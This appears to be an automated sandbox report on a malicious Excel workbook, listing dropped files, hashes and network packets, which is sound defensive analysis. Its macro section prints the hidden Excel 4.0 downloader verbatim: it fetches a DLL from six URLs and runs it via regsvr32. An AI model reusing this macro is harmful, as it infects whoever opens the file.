Malicious:	false
Reputation:	low
Preview:	p...... ...........X.E..(....................................................... ........%,.)......(...........@...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".8.0.2.5.2.c.e.6.b.2.2.9.d.8.1.:.0."...

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\eVzUZ7dv5zBAXa5[1].dll

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	downloaded
Size (bytes):	868352
Entropy (8bit):	6.023557193294397
Encrypted:	false
SSDEEP:	12288:OBOHvWMwoyDdgp4W5dhdu1sRcwg8b3UHv8qDznxN6t:OX/RgaW5dhc8oHvbzn6
MD5:	B919214A85847B6AB4758021C740E652
SHA1:	590C10843F8D572BE1C7BE35C04292DB17839ECB
SHA-256:	3E7C8C7B2A136FA9D519189F78549DE4783417CFB6E8285351832088E5C8883B
SHA-512:	1E086096D9886552C6D58BF4235EAC30BEDA9779C31ECCF2B2C4FC5A054F18D27E06BFF239424466028016ED619922FB9241720B983AF0D2DA90277B3C4B003A
Malicious:	true
Reputation:	low
IE Cache URL:	http://eles-tech.com/css/KzMysMqFMs/
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........m.]...]...].......x...]...e...?...N...]........F...........\..........\...Rich]...........................PE..L....1Fb...........!....................................................................................................................34......................\t...................................................................................text...~........................... ..`.rdata..N7.......@..................@..@.data...(........P..................@....idata...<.......@...0..............@....rsrc...34.......@...p..............@..@.reloc..G...........................@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6F230AC8.jpg

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 2159x57, frames 3
Category:	dropped
Size (bytes):	29992
Entropy (8bit):	7.86369524906802
Encrypted:	false
SSDEEP:	768:IxNskmoKjBvK3HqK88F/G6YzATUfJnXYS6oN:IDLmXi3JvG6YzATOJnXYSXN
MD5:	C8FC17FF030FEB3383D8889F69ABBB9C
SHA1:	7A1A55B6464BA4BCC165856C1AB7D646652755BD
SHA-256:	54E99B9DCC602AB83A98AAE60B965D0E2BB3B6281D0A65DDBA4D14DD53ABD30F
SHA-512:	D68C053AF7AD5DF220D22399EBA957C57704C5C6845664851AF69DCAB5043B85FDCDAA90B33F64EB665D7421AAF2A4E25385E95FC397CB59135B7C0AED1543B4
Malicious:	false
Reputation:	low
Preview:	......JFIF.....`.`.....C....................................................................C.......................................................................9.o.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..\|..+.?H.(.....j...a.3]......n...i..I.."RF[.'....&..&.hP.4.._......m.%.b12Q.wo..Z...n<.~.....a...u.......Ch..........n.....D..$.$.j..../~..)....m.]Rh...W....2F...Xd._yO.G.J.Sj.:..G.&~sS...t....6....h.P..;.....2..X....F.....+=j$...x.p..'...b.Z.......'.e..&6}.....Mu>.%.0...o...T.i.k.O..(.....(.q...PF...Z.(.....z.2...)Y.>..E..8V?A@........4....v...(...e..

C:\Users\user\AppData\Local\Temp\Cab3198.tmp

Download File

Process:	C:\Windows\SysWOW64\regsvr32.exe
File Type:	Microsoft Cabinet archive data, 60992 bytes, 1 file
Category:	dropped
Size (bytes):	60992
Entropy (8bit):	7.994637486921971
Encrypted:	true
SSDEEP:	1536:1ccLOuSwR3W8vM1pjd8MpGwIMESUnWWiidx34:1ccLm6W8vUBCMpGwIMEDnqe4
MD5:	637481DF32351129E60560D5A5C100B5
SHA1:	A46AEE6E5A4A4893FBA5806BCC14FC7FB3CE80AE
SHA-256:	1F1029D94CA4656A577D554CEDD79D447658F475AF08620084897A5523587052
SHA-512:	604BFD0A78A57DFDDD45872803501AD89491E37E89E0778B0F13644FA9164FF509955A57469DFDD65A05BBEDAF0ACB669F68430E84800D17EFE7D360A70569E3
Malicious:	false
Reputation:	high, very likely benign file
Preview:	MSCF....@.......,...................I.......]t........VT+V .authroot.stl.K.&.4..CK..<Tk...c_.d....A.K.....Y.f.]%.BJ$RHnT..i/.]...s.H..k....n.3.......S..9.s.....3H$M.%...h..qV.=M..].4.I.....V:F.h]......B`..,......D.0a....H.G..:...XF.F..MJ`.H. 7......._....lE..he.4\|.?....h...7..P~8.\|.,. .....#0+..o...g...}U2n............'.Dp.;..f..ljX.Dx..r<'.1RA3B0<..D.z...)D\|..8<..c..'XH..I,.Y..d.b.".A......cm_nVb[w..rDp.....y%.\|7...^.#.#[...3~3.g..CN......k;...C.`.C.iB.`-...\|.....y.(....]~`>... .p..q<..g..i...y..\|.....I...T8B.Ag#U......G.9+.x6..a.c.3...X.4E........N..:X.F...S...X...ku..O.J...)Z....PAk..%.+..n..z<.2.......w2c@.((*.J.dN...\!o@.........0..3.`.DU.3.%0.G...4Sv...5.T.?.......p..".........\|..j.4.H...g.(...^.....w.......\|...#..og)>..t.}.k.G\|.2K.5..ik.......0..~ ">......A...ku..d..Y..@D....YO.{.9..:)..L..=D..O...6.n....ui<..w.[O...P>..y.L....J......r.!.5.u.3..-`..r,aH.B <..t..8.c.{u.<'.3.........u.3..[W.....2...$..eAo.m...w...............g$m.`..

C:\Users\user\AppData\Local\Temp\Tar3199.tmp

Download File

Process:	C:\Windows\SysWOW64\regsvr32.exe
File Type:	data
Category:	modified
Size (bytes):	160861
Entropy (8bit):	6.301243810050655
Encrypted:	false
SSDEEP:	1536:0I/6crtilgCyNY2Ip/5ib6NWdm1wpTru2RPZz04D8rlCMiB3XlMt63:070imCy/dm0Tru2RN97MiVG43
MD5:	30644DA711C99BE812B06023C163B751
SHA1:	EFFC167CE6206A4E92375C9509943CC86058E3C7
SHA-256:	96DBA3D67364C1E75DAB241D4A023B48F4D6453F495175B210F525E930CF144B
SHA-512:	7799722409CB4BD9098312235824D72427F8761495B2824798E69AF43021E180BBC2679E70CF6EC3CDA5C8422CE601051AD674587321C5F7419FAED1B027432E
Malicious:	false
Preview:	0..tX...H.........tH0..tC...1.0...`.H.e......0..d...+.....7.....d.0..d.0...+.....7........(.?.....220222184440Z0...+......0..dY0..D.....`...@.,..0..0.r1..0...+.....7..h1......+h...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o

C:\Users\user\Desktop\~$qd_34768.xlsm

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	165
Entropy (8bit):	1.4377382811115937
Encrypted:	false
SSDEEP:	3:vZ/FFDJw2fV:vBFFGS
MD5:	797869BB881CFBCDAC2064F92B26E46F
SHA1:	61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
SHA-256:	D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
SHA-512:	1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
Malicious:	true
Preview:	.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C:\Users\user\xewn.dll

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	868352
Entropy (8bit):	6.023557193294397
Encrypted:	false
SSDEEP:	12288:OBOHvWMwoyDdgp4W5dhdu1sRcwg8b3UHv8qDznxN6t:OX/RgaW5dhc8oHvbzn6
MD5:	B919214A85847B6AB4758021C740E652
SHA1:	590C10843F8D572BE1C7BE35C04292DB17839ECB
SHA-256:	3E7C8C7B2A136FA9D519189F78549DE4783417CFB6E8285351832088E5C8883B
SHA-512:	1E086096D9886552C6D58BF4235EAC30BEDA9779C31ECCF2B2C4FC5A054F18D27E06BFF239424466028016ED619922FB9241720B983AF0D2DA90277B3C4B003A
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........m.]...]...].......x...]...e...?...N...]........F...........\..........\...Rich]...........................PE..L....1Fb...........!....................................................................................................................34......................\t...................................................................................text...~........................... ..`.rdata..N7.......@..................@..@.data...(........P..................@....idata...<.......@...0..............@....rsrc...34.......@...p..............@..@.reloc..G...........................@..B........................................................................................................................................................................................................................................................................

C:\Windows\SysWOW64\Onodwrlgmyciiaw\qayqfx.jrd (copy)

Download File

Process:	C:\Windows\SysWOW64\regsvr32.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	868352
Entropy (8bit):	6.023557193294397
Encrypted:	false
SSDEEP:	12288:OBOHvWMwoyDdgp4W5dhdu1sRcwg8b3UHv8qDznxN6t:OX/RgaW5dhc8oHvbzn6
MD5:	B919214A85847B6AB4758021C740E652
SHA1:	590C10843F8D572BE1C7BE35C04292DB17839ECB
SHA-256:	3E7C8C7B2A136FA9D519189F78549DE4783417CFB6E8285351832088E5C8883B
SHA-512:	1E086096D9886552C6D58BF4235EAC30BEDA9779C31ECCF2B2C4FC5A054F18D27E06BFF239424466028016ED619922FB9241720B983AF0D2DA90277B3C4B003A
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........m.]...]...].......x...]...e...?...N...]........F...........\..........\...Rich]...........................PE..L....1Fb...........!....................................................................................................................34......................\t...................................................................................text...~........................... ..`.rdata..N7.......@..................@..@.data...(........P..................@....idata...<.......@...0..............@....rsrc...34.......@...p..............@..@.reloc..G...........................@..B........................................................................................................................................................................................................................................................................

Static File Info

General

File type:	Microsoft Excel 2007+
Entropy (8bit):	7.7318764495518275
TrID:	Excel Microsoft Office Open XML Format document with Macro (51004/1) 51.52% Excel Microsoft Office Open XML Format document (40004/1) 40.40% ZIP compressed archive (8000/1) 8.08%
File name:	qd_34768.xlsm
File size:	47738
MD5:	07f30f1fa5420f050ea5929af0f95265
SHA1:	6310b51fca4003fb36252367f058c2e990ba5734
SHA256:	48f3ef54ff2ed0b44d5e4836c56a3a8f3214d7214278172ef84166f6d42cc067
SHA512:	f16cad27fc864c23ed1c753f5eb319bf79f9d96c40edc70924b25410d5547c2c1bbb4c06b002f8e2bb246d35408bd4fa0e2e526a36ceb344fa399324e2758c80
SSDEEP:	768:QmBlntZhEI2YmxNskmoKjBvK3HqK88F/G6YzATUfJnXYS6oRM:hBlntTEvDLmXi3JvG6YzATOJnXYSXRM
File Content Preview:	PK..........!.................[Content_Types].xml ...(.........................................................................................................................................................................................................

File Icon


Icon Hash:	e4e2aa8aa4bcbcac

Static OLE Info

General

Document Type:	OpenXML
Number of OLE Files:	1

OLE File "qd_34768.xlsm"

Indicators

Has Summary Info:
Application Name:
Encrypted Document:
Contains Word Document Stream:
Contains Workbook/Book Stream:
Contains PowerPoint Document Stream:
Contains Visio Document Stream:
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:

Macro 4.0 Code

Name:	PIMKE
Type:	4
Final:	False
Visible:	False
Protected:	False
PIMKE4False0Falsepre9,2,=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://eles-tech.com/css/KzMysMqFMs/","..\xewn.dll",0,0)",C14)=FORMULA("=IF(IVFB1<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://gonorthhalifax.com/wp-content/yTmYyLbTKZV2czsUO/","..\xewn.dll",0,0))",C16)=FORMULA("=IF(IVFB2<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://txpcrescue.com/cgi-bin/5tSO8/","..\xewn.dll",0,0))",C18)=FORMULA("=IF(IVFB3<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://hadramout21.com/jetpack-temp/Py/","..\xewn.dll",0,0))",C20)=FORMULA("=IF(IVFB4<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://haribuilders.com/zoombox-master/4HYGX/","..\xewn.dll",0,0))",C22)=FORMULA("=IF(IVFB5<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://hansen-arnal.com/cp/iiTrAeEtvOwmjjekWgI/","..\xewn.dll",0,0))",C24)=FORMULA("=IF(IVFB6<0, CLOSE(0),)",C26)=FORMULA("=EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\xewn.dll")",C28)=FORMULA("=RETURN()",C32)

Name:	PIMKE
Type:	4
Final:	False
Visible:	False
Protected:	False
PIMKE4False0Falsepost9,2,=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://eles-tech.com/css/KzMysMqFMs/","..\xewn.dll",0,0)",C14)=FORMULA("=IF(IVFB1<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://gonorthhalifax.com/wp-content/yTmYyLbTKZV2czsUO/","..\xewn.dll",0,0))",C16)=FORMULA("=IF(IVFB2<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://txpcrescue.com/cgi-bin/5tSO8/","..\xewn.dll",0,0))",C18)=FORMULA("=IF(IVFB3<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://hadramout21.com/jetpack-temp/Py/","..\xewn.dll",0,0))",C20)=FORMULA("=IF(IVFB4<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://haribuilders.com/zoombox-master/4HYGX/","..\xewn.dll",0,0))",C22)=FORMULA("=IF(IVFB5<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://hansen-arnal.com/cp/iiTrAeEtvOwmjjekWgI/","..\xewn.dll",0,0))",C24)=FORMULA("=IF(IVFB6<0, CLOSE(0),)",C26)=FORMULA("=EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\xewn.dll")",C28)=FORMULA("=RETURN()",C32)13,2,=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://eles-tech.com/css/KzMysMqFMs/","..\xewn.dll",0,0)15,2,=IF(IVFB1<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://gonorthhalifax.com/wp-content/yTmYyLbTKZV2czsUO/","..\xewn.dll",0,0))17,2,=IF(IVFB2<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://txpcrescue.com/cgi-bin/5tSO8/","..\xewn.dll",0,0))19,2,=IF(IVFB3<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://hadramout21.com/jetpack-temp/Py/","..\xewn.dll",0,0))21,2,=IF(IVFB4<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://haribuilders.com/zoombox-master/4HYGX/","..\xewn.dll",0,0))23,2,=IF(IVFB5<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://hansen-arnal.com/cp/iiTrAeEtvOwmjjekWgI/","..\xewn.dll",0,0))25,2,=IF(IVFB6<0, CLOSE(0),)27,2,=EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\xewn.dll")31,2,=RETURN()

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 31, 2022 22:52:04.149321079 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:04.205347061 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:04.205596924 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:04.207230091 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:04.260242939 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:04.721307993 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:04.721391916 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:04.721446991 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:04.721465111 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:04.721497059 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:04.721499920 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:04.721544981 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:04.721554041 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:04.721601963 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:04.721616983 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:04.721661091 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:04.721671104 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:04.721716881 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:04.721724987 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:04.721771955 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:04.721779108 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:04.721827030 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:04.721832991 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:04.721880913 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:04.729486942 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:04.773739100 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:04.773817062 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:04.773860931 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:04.773870945 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:04.773884058 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:04.773926020 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:04.773977041 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:04.774621964 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:04.774677992 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:04.774729967 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:04.774740934 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:04.774781942 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:04.774831057 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:04.775355101 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:04.775417089 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:04.775422096 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:04.775468111 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:04.775518894 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:04.775527000 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:04.775569916 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:04.776072025 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:04.776125908 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:04.776156902 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:04.776175022 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:04.776180029 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:04.776231050 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:04.776279926 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:04.776474953 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:04.776530981 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:04.776541948 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:04.776580095 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:04.776582956 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:04.776633024 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:04.776637077 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:04.776748896 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:04.825921059 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:04.826000929 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:04.826011896 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:04.826046944 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:04.826069117 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:04.826119900 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:04.826121092 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:04.826169968 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:04.826731920 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:04.826787949 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:04.826798916 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:04.826848030 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:04.826889038 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:04.826905012 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:04.826941967 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:04.826950073 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:04.827894926 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:04.827951908 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:04.827965975 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:04.827994108 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:04.828039885 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:04.828056097 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:04.828121901 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:04.828262091 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:04.828609943 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:04.828666925 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:04.828674078 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:04.828711987 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:04.828723907 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:04.828778028 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:04.828784943 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:04.828860044 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:04.829221010 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:04.829274893 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:04.829328060 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:04.829328060 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:04.829334021 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:04.829382896 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:04.829390049 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:04.829487085 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:04.829756021 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:04.829811096 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:04.829822063 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:04.829865932 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:04.829870939 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:04.829919100 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:04.829924107 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:04.829979897 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:04.830471992 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:04.830526114 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:04.830545902 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:04.830579042 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:04.830594063 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:04.830636024 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:04.830636978 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:04.830683947 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:04.830688953 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:04.830737114 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:04.830743074 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:04.830789089 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:04.830826044 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:04.830873013 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:04.830879927 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:04.830929041 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:04.830935955 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:04.830982924 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:04.830987930 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:04.831037045 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:04.831644058 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:04.831697941 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:04.831712008 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:04.831749916 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:04.831751108 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:04.831804037 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:04.831839085 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:04.831852913 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:04.831857920 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:04.831899881 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:04.831913948 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:04.831955910 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:04.879337072 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:04.879412889 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:04.879468918 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:04.879508018 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:04.879522085 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:04.879538059 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:04.879579067 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:04.879781008 CEST	80	49165	185.46.40.47	192.168.2.22
